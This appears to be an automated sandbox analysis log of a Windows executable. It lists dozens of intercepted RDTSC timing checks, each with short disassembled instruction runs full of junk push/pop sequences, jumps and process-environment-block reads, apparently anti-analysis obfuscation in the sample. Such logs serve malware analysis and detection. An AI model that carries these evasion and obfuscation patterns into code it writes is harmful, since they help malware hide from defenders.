Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1311024 second address: 1311036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1311036 second address: 131103B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1303DB0 second address: 1303DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1303DB4 second address: 1303DDB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C1CD203F6h 0x00000008 jmp 00007F8C1CD203FBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007F8C1CD203F6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1303DDB second address: 1303DFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C1CD63248h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 131F27A second address: 131F27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EC2B3 second address: 13EC2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EC2B8 second address: 13EC2D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20404h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB38D second address: 13EB398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB398 second address: 13EB39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB39C second address: 13EB3A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB3A2 second address: 13EB3AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB3AA second address: 13EB3EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63247h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8C1CD63246h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8C1CD6323Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB52C second address: 13EB532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB532 second address: 13EB544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c js 00007F8C1CD63236h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB544 second address: 13EB578 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C1CD203F6h 0x00000008 jc 00007F8C1CD203F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8C1CD20401h 0x00000019 jmp 00007F8C1CD203FFh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB578 second address: 13EB581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB581 second address: 13EB58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8C1CD203F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB58D second address: 13EB592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB700 second address: 13EB71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C1CD20408h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EB71D second address: 13EB75B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007F8C1CD63254h 0x00000010 jmp 00007F8C1CD63248h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EBE8B second address: 13EBE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13EF2D5 second address: 13EF2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13F208B second address: 13F20A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8C1CD203FEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13F20A3 second address: 13F20A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13F20A7 second address: 13F20D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push edx 0x00000009 jmp 00007F8C1CD203FFh 0x0000000e jmp 00007F8C1CD20402h 0x00000013 pop edx 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13F20D9 second address: 13F20DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0042 second address: 76C0054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD203FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0054 second address: 76C006B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C006B second address: 76C0088 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C1CD20402h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0088 second address: 76C0099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0099 second address: 76C009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C009D second address: 76C00D1 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8C1CD63240h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ax, di 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edi, esi 0x00000015 call 00007F8C1CD63242h 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C00D1 second address: 76C00F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20400h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov al, DBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C00F0 second address: 76C014D instructions: 0x00000000 rdtsc 0x00000002 mov bh, 9Eh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F8C1CD63242h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e popad 0x0000000f sub esp, 18h 0x00000012 pushad 0x00000013 push edi 0x00000014 pushfd 0x00000015 jmp 00007F8C1CD63248h 0x0000001a sbb ax, 7B28h 0x0000001f jmp 00007F8C1CD6323Bh 0x00000024 popfd 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F8C1CD6323Fh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C014D second address: 76C018A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8C1CD20408h 0x00000008 jmp 00007F8C1CD20405h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ax, 3AF5h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C018A second address: 76C021E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F8C1CD6323Fh 0x00000010 jmp 00007F8C1CD63243h 0x00000015 popfd 0x00000016 mov bx, si 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F8C1CD63242h 0x00000020 mov ebx, dword ptr [eax+10h] 0x00000023 pushad 0x00000024 mov eax, 3BEC756Dh 0x00000029 mov esi, 35E7FB69h 0x0000002e popad 0x0000002f xchg eax, esi 0x00000030 jmp 00007F8C1CD63244h 0x00000035 push eax 0x00000036 pushad 0x00000037 mov edx, 39F899E4h 0x0000003c popad 0x0000003d xchg eax, esi 0x0000003e jmp 00007F8C1CD63246h 0x00000043 mov esi, dword ptr [762C06ECh] 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push ebx 0x0000004d pop eax 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C021E second address: 76C024F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20402h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C1CD20407h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C024F second address: 76C02F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 call 00007F8C1CD6323Bh 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F8C1CD641DAh 0x00000015 pushad 0x00000016 mov cx, dx 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F8C1CD63248h 0x00000020 mov dword ptr [esp], edi 0x00000023 pushad 0x00000024 mov bx, cx 0x00000027 mov bx, si 0x0000002a popad 0x0000002b call dword ptr [76290B60h] 0x00000031 mov eax, 75A0E5E0h 0x00000036 ret 0x00000037 pushad 0x00000038 mov bx, cx 0x0000003b pushfd 0x0000003c jmp 00007F8C1CD6323Eh 0x00000041 add eax, 4B157548h 0x00000047 jmp 00007F8C1CD6323Bh 0x0000004c popfd 0x0000004d popad 0x0000004e push 00000044h 0x00000050 jmp 00007F8C1CD63246h 0x00000055 pop edi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 movsx edx, ax 0x0000005c jmp 00007F8C1CD63246h 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C02F5 second address: 76C033C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C1CD20401h 0x00000008 movzx ecx, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8C1CD20406h 0x00000016 add cx, 1F98h 0x0000001b jmp 00007F8C1CD203FBh 0x00000020 popfd 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C033C second address: 76C0380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F8C1CD63244h 0x0000000a add al, FFFFFFF8h 0x0000000d jmp 00007F8C1CD6323Bh 0x00000012 popfd 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp], edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8C1CD63245h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0380 second address: 76C03A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C1CD203FDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C03A6 second address: 76C03B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD6323Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C03FE second address: 76C0416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD20404h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0416 second address: 76C0489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d pushad 0x0000000e mov cl, D2h 0x00000010 mov edx, 53BDE1B4h 0x00000015 popad 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F8C1CD63249h 0x0000001f or cx, 0826h 0x00000024 jmp 00007F8C1CD63241h 0x00000029 popfd 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007F8C1CD6323Eh 0x00000032 or eax, 147FF1C8h 0x00000038 jmp 00007F8C1CD6323Bh 0x0000003d popfd 0x0000003e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0489 second address: 76C0520 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4F3CEB3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F8C8B89F60Bh 0x00000010 pushad 0x00000011 mov al, dl 0x00000013 popad 0x00000014 sub eax, eax 0x00000016 pushad 0x00000017 push ebx 0x00000018 jmp 00007F8C1CD20400h 0x0000001d pop eax 0x0000001e pushfd 0x0000001f jmp 00007F8C1CD203FBh 0x00000024 sbb ch, 0000006Eh 0x00000027 jmp 00007F8C1CD20409h 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esi], edi 0x00000030 jmp 00007F8C1CD203FEh 0x00000035 mov dword ptr [esi+04h], eax 0x00000038 pushad 0x00000039 call 00007F8C1CD203FEh 0x0000003e pushad 0x0000003f popad 0x00000040 pop ecx 0x00000041 mov eax, edx 0x00000043 popad 0x00000044 mov dword ptr [esi+08h], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F8C1CD20405h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0520 second address: 76C0526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0526 second address: 76C052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C052C second address: 76C0547 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8C1CD6323Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0547 second address: 76C0556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C06AF second address: 76C0766 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F8C1CD63248h 0x0000000d sub eax, 246BD898h 0x00000013 jmp 00007F8C1CD6323Bh 0x00000018 popfd 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+58h] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F8C1CD63244h 0x00000024 or al, FFFFFFF8h 0x00000027 jmp 00007F8C1CD6323Bh 0x0000002c popfd 0x0000002d jmp 00007F8C1CD63248h 0x00000032 popad 0x00000033 mov dword ptr [esi+1Ch], eax 0x00000036 pushad 0x00000037 movzx esi, bx 0x0000003a mov bx, 3B6Eh 0x0000003e popad 0x0000003f mov eax, dword ptr [ebx+5Ch] 0x00000042 jmp 00007F8C1CD63245h 0x00000047 mov dword ptr [esi+20h], eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F8C1CD63248h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0766 second address: 76C0775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0775 second address: 76C078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD63244h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C078D second address: 76C0791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0791 second address: 76C083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+60h] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8C1CD63243h 0x00000013 sbb ecx, 73909C3Eh 0x00000019 jmp 00007F8C1CD63249h 0x0000001e popfd 0x0000001f mov di, ax 0x00000022 popad 0x00000023 popad 0x00000024 mov dword ptr [esi+24h], eax 0x00000027 jmp 00007F8C1CD63249h 0x0000002c mov eax, dword ptr [ebx+64h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F8C1CD63243h 0x00000038 add ecx, 4CE1DBAEh 0x0000003e jmp 00007F8C1CD63249h 0x00000043 popfd 0x00000044 call 00007F8C1CD63240h 0x00000049 pop ecx 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C083F second address: 76C0892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20400h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c jmp 00007F8C1CD20400h 0x00000011 mov eax, dword ptr [ebx+68h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F8C1CD203FDh 0x0000001d and cx, 9BF6h 0x00000022 jmp 00007F8C1CD20401h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0892 second address: 76C08BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C1CD63247h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C08BE second address: 76C08C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C08C4 second address: 76C096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+6Ch] 0x0000000f jmp 00007F8C1CD63246h 0x00000014 mov word ptr [esi+30h], ax 0x00000018 jmp 00007F8C1CD63240h 0x0000001d mov ax, word ptr [ebx+00000088h] 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F8C1CD6323Eh 0x0000002b adc ah, 00000038h 0x0000002e jmp 00007F8C1CD6323Bh 0x00000033 popfd 0x00000034 pushfd 0x00000035 jmp 00007F8C1CD63248h 0x0000003a add si, FE98h 0x0000003f jmp 00007F8C1CD6323Bh 0x00000044 popfd 0x00000045 popad 0x00000046 mov word ptr [esi+32h], ax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F8C1CD63245h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C096F second address: 76C0975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0975 second address: 76C0979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0979 second address: 76C099B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ah, E4h 0x00000013 call 00007F8C1CD203FDh 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C099B second address: 76C0A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 call 00007F8C1CD63249h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+34h], eax 0x00000011 jmp 00007F8C1CD63247h 0x00000016 mov eax, dword ptr [ebx+18h] 0x00000019 jmp 00007F8C1CD63246h 0x0000001e mov dword ptr [esi+38h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov ah, bh 0x00000026 jmp 00007F8C1CD63246h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0A0F second address: 76C0A42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c jmp 00007F8C1CD20406h 0x00000011 mov dword ptr [esi+3Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ecx, edx 0x00000019 mov ecx, edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0A42 second address: 76C0A74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63242h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+20h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C1CD63247h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C0A74 second address: 76C0AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C1CD203FFh 0x00000008 mov eax, 036BB63Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esi+40h], eax 0x00000013 jmp 00007F8C1CD20402h 0x00000018 lea eax, dword ptr [ebx+00000080h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 call 00007F8C1CD203FCh 0x00000026 pop esi 0x00000027 rdtsc
